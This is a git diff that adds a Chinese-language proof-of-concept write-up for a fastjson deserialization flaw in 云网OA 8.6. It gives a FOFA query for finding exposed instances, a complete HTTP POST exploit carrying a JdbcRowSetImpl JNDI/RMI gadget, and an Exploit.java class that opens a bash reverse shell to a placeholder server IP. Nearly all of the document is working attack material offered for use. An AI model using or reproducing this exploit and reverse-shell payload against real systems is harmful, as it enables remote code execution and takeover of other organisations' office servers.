diff --git a/云网OA8.6存在fastjson反序列化漏洞.md b/云网OA8.6存在fastjson反序列化漏洞.md new file mode 100644 index 0000000..b60825f --- /dev/null +++ b/云网OA8.6存在fastjson反序列化漏洞.md @@ -0,0 +1,51 @@ +## 云网OA8.6存在fastjson反序列化漏洞 + +云网OA8.6使用fastjson1.2.37造成反序列化漏洞 + +## fofa +``` +"云网OA" +``` + +## poc +``` +POST /oa//setup/updateUiSetup HTTP/1.1 +Host: 192.168.0.7:8096 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: skincode=lte; name=admin; pwd=; JSESSIONID=85F37A117572BE90EA4BA0ED10F77EF5 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 196 + +uiSetup={"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1389/Exploit", "autoCommit":true}} + +``` +![a8ac139413588a49d844ca534afce1ed](https://github.com/wy876/POC/assets/139549762/773d195f-9171-4783-956b-4db556f93aae) + +![bb988d242c8d788aca44bd3e22f2650b](https://github.com/wy876/POC/assets/139549762/15be1a39-4102-4864-8cae-71e21e56187b) + +### Exploit.java +``` +public class Exploit { + public Exploit(){ + try { + java.lang.Runtime.getRuntime().exec( + new String[]{"bash", "-c", "bash -i >& /dev/tcp/服务器IP/12345 0>&1"}); + } + catch(Exception e){ + e.printStackTrace(); + } + } + public static void main(String[] argv){ + Exploit e = new Exploit(); + } +} +``` + +## 漏洞来源 +- https://mp.weixin.qq.com/s/KNE7khKhG9-FLTJK73ZfNQ